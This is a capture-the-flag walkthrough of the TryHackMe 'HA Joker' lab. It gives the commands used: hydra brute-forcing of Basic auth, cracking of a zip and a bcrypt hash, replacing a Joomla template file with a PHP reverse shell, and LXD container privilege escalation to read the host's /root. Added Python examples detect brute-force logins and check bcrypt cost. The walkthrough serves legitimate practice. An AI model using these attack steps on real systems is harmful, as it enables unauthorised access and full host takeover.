TryHackMe-HA Joker CTF-Walkthrough

JasserLOGCS
7 min read · Mar 22, 2024


Batman hits Joker.

Description :

We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

  1. Enumerate Services
    - Nmap
  2. Bruteforce
    - Performing Bruteforce on files over http
    - Performing Bruteforce on Basic Authentication
  3. Hash Crack
    - Performing Bruteforce on hash to crack zip file
    - Performing Bruteforce on hash to crack mysql user
  4. Exploitation
    - Getting a reverse connection
    - Spawning a TTY Shell
  5. Privilege Escalation
    - Get root taking advantage of flaws in LXD

So let's begin the challenge.

Task 1 : Enumerate services on the target machine.

nmap -sV -sC -A ip   # replace ip with the target machine's address

Task 2 : What version of Apache is it?

Answer : 2.4.29

Task 3 : What port on this machine does not need to be authenticated by user and password?

Answer : 80

Task 4 : There is a file on this port that seems to be secret, what is it?

Let's use gobuster or dirsearch to find interesting files or directories, adding a few file extensions to the search:

gobuster dir -u "http://ip_machine" -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Answer : secret.txt

Task 5 : There is another file which reveals information of the backend, what is it?

In the same gobuster output we find a file with the .php extension.

Answer : phpinfo.php

Task 6 : When reading the secret file, we find a conversation that seems to contain at least two users and some keywords that can be interesting. What user do you think it is?

Let's visit http://ip/secret.txt in the browser, or fetch it with curl:

curl -s http://ip/secret.txt

Answer : jocker

Task 7 : What port on this machine need to be authenticated by Basic Authentication Mechanism?

Answer : 8080

Task 8 : At this point we have one user and a url that needs to be authenticated, brute force it to get the password, what is that password?

Let's use hydra to find the password for the user joker (Burp Suite would also work). Here we run hydra with rockyou.txt, but any password list will do:

hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 ip_machine http-get

Answer : hannah

Task 9 : Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

There is a robots.txt file that discloses several locations, one of which (/administrator/) is particularly interesting:

curl -s -H "Authorization: Basic am9rZXI6aGFubmFo" http://ip_machine:8080/robots.txt

Answer : /administrator/
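Two defender-side points from Tasks 8 and 9 are worth seeing in code: the Basic `Authorization` header in the curl command above is only base64, so the credentials travel in recoverable form over plain HTTP, and a hydra run like the one above leaves a very recognisable trace in the web server's access log. The script below is an added example (not part of the write-up or of the TryHackMe room): it decodes a Basic header and then runs a simple burst detector over a constructed Apache "combined" access log for port 8080. The log lines, IP addresses and timestamps are made up for the example; the threshold and window are assumed parameters.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of an Apache "combined" access log for the Basic-Auth port.
# The client IPs, timestamps and user agents are invented for this example.
SAMPLE_LOG = """\
10.10.14.7 - - [22/Mar/2024:10:15:01 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0 (Hydra)"
10.10.14.7 - - [22/Mar/2024:10:15:01 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0 (Hydra)"
10.10.14.7 - - [22/Mar/2024:10:15:02 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0 (Hydra)"
10.10.14.7 - - [22/Mar/2024:10:15:02 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0 (Hydra)"
10.10.14.7 - - [22/Mar/2024:10:15:03 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0 (Hydra)"
10.10.14.7 - joker [22/Mar/2024:10:15:03 +0000] "GET / HTTP/1.1" 200 9821 "-" "Mozilla/5.0 (Hydra)"
192.168.1.20 - - [22/Mar/2024:10:15:10 +0000] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0"
192.168.1.20 - joker [22/Mar/2024:10:15:25 +0000] "GET / HTTP/1.1" 200 9821 "-" "Mozilla/5.0"
"""

# ip, ident, authenticated user, timestamp, request line, status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)


def decode_basic_header(header_value):
    """Split a 'Basic <base64>' header value back into (user, password).
    Shows why Basic auth is only safe over TLS: there is no secrecy here."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def find_basic_auth_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: summary} for clients whose 401 responses reach `threshold`
    within any `window_seconds` window. The summary also records whether the
    same client later got a 200 as an authenticated user, i.e. a guess worked."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events[m["ip"]].append((ts, int(m["status"]), m["user"]))

    findings = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        window, max_in_window, success_as = [], 0, None
        for ts, status, user in evs:
            if status == 401:
                window.append(ts)
                # drop failures that fell out of the sliding window
                while ts - window[0] > timedelta(seconds=window_seconds):
                    window.pop(0)
                max_in_window = max(max_in_window, len(window))
            elif status == 200 and user != "-" and max_in_window >= threshold:
                success_as = user
        if max_in_window >= threshold:
            findings[ip] = {
                "max_failures_in_window": max_in_window,
                "then_authenticated_as": success_as,
            }
    return findings


if __name__ == "__main__":
    print(decode_basic_header("Basic am9rZXI6aGFubmFo"))
    for ip, summary in find_basic_auth_bruteforce(SAMPLE_LOG).items():
        print(ip, summary)
```

The single failed login from 192.168.1.20 is not reported, while the burst from 10.10.14.7 is, together with the account it ended up authenticating as; that "burst of 401s followed by a 200" pattern is the one to alert on, and rate-limiting or fail2ban-style blocking on the same signal is the usual mitigation.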

Task 10 : We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

Let's run gobuster again, this time with the credentials and some backup-file extensions:

gobuster dir -U joker -P hannah -u http://ip_machine:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/dirb/common.txt

Answer : backup.zip

Task 11 : We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?

Let's download the file with wget, using the credentials we found, and then try to uncompress it:

wget --user=joker --password=hannah http://ip_machine:8080/backup.zip

When we try to unzip it, it asks for a password.

Let's try to crack it with zip2john (then john) or fcrackzip; I used fcrackzip and it found the password.

Answer : hannah

Task 12 : Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

When we uncompress it we find two folders, db and site. Let's look at site first and check configuration.php; I print just the first 20 lines using head:

head -n20 configuration.php

But since we don't have access to the database itself, we are more interested in valid users for the Joomla website. Let's go back to the db folder.

Let’s search for the interesting table:

$ grep "CREATE TABLE" joomladb.sql | grep user

And now that we know the table:

$ grep cc1gr_users joomladb.sql

Answer : admin

Task 13 : Super Duper User! What is the password?

In the previous output we found the admin's password hash: $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG

Let's crack it with john; first save the hash into a file named admin.hash.

Answer : abcd1234
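The `$2y$10$` prefix on that hash tells you quite a lot before any cracking happens: `2y` is the bcrypt identifier used by PHP's `password_hash`, and `10` is the cost, so each guess costs 2^10 key-setup rounds. That only slows a cracker down per guess; a password like abcd1234 sits near the top of any wordlist and falls anyway. The parser below is an added example (not from the write-up or from Joomla) that splits the hash from the page into its fields and checks the cost against a policy floor; the floor of 12 is an assumed parameter, not something the page states.

```python
import re

# Modular-crypt-format layout of a bcrypt hash (60 characters in total):
#   $<version>$<cost>$<22-char salt><31-char hash>
BCRYPT_RE = re.compile(
    r"^\$(?P<version>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<hash>[./A-Za-z0-9]{31})$"
)

# The admin hash recovered from joomladb.sql in the write-up.
ADMIN_HASH = "$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG"


def parse_bcrypt(value):
    """Split a bcrypt string into version, cost, salt and digest.
    Raises ValueError for anything that is not well-formed bcrypt."""
    m = BCRYPT_RE.match(value)
    if not m:
        raise ValueError("not a bcrypt hash in modular crypt format")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost must be between 4 and 31")
    return {
        "version": m["version"],
        "cost": cost,
        "rounds": 2 ** cost,  # expensive key-setup iterations per guess
        "salt": m["salt"],
        "hash": m["hash"],
    }


def cost_meets_policy(value, minimum_cost=12):
    """True when the work factor is at least `minimum_cost`
    (12 is the assumed policy floor here; the page's hash uses 10)."""
    return parse_bcrypt(value)["cost"] >= minimum_cost


def relative_slowdown(from_cost, to_cost):
    """How many times slower each guess becomes when the cost is raised."""
    return 2 ** (to_cost - from_cost)


if __name__ == "__main__":
    fields = parse_bcrypt(ADMIN_HASH)
    print(fields)
    print("meets cost policy:", cost_meets_policy(ADMIN_HASH))
    print("cost 10 -> 12 slows each guess by", relative_slowdown(10, 12), "x")
```

Raising the cost from 10 to 12 makes every guess four times slower, which is worth doing, but the lesson from this box is that the admin password itself, not the hash algorithm, is what let john finish quickly.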

Task 14 : At this point, you should upload a reverse-shell in order to gain shell access. What is the owner of this session?

We are now able to authenticate with admin:abcd1234 to the administration backend of Joomla. Let’s create a webshell.

From the Control Panel go to Configuration > Templates > Templates > Beez3 Details and Files. Click on error.php to edit the code and replace it with a PHP reverse shell ( http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz)

And here we go!

Answer : www-data

Task 15 : This user belongs to a group that differs from your own group, What is this group?

We are a member of the lxd group, which tells us that LXD (Linux containers) is installed on the box (check the hints).

Answer : lxd

Task 16 : Spawn a tty shell.

We can do that as follows:

$ SHELL=/bin/bash script -q /dev/null

Or with python:

$ python3 -c "import pty;pty.spawn('/bin/bash')"

Task 17 : In this question you should do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.

Read documentation about LXC / LXD: https://linuxcontainers.org/lxd/introduction/

Task 18 : Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.

Now let's list the installed images:

lxc image list

Task 19 : The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

If the list is empty and there is no myalpine image, you can build and import one yourself.

First download the image on your machine:

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine

Transfer the resulting tar.gz file (e.g. alpine-v3.12-x86_64-20200623_1255.tar.gz) to the target.

Now, on the target, import the image.

lxc image import alpine-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
lxc image list

Answer : myalpine

What is the name of the file in the /root directory?

Just run the following, then look in /mnt/root/root inside the container (the host's /root):

lxc init myalpine joker -c security.privileged=true
lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
lxc start joker
lxc exec joker /bin/sh

Answer : final.txt

Thank you for taking the time to read my write-up; your feedback is very important to me!
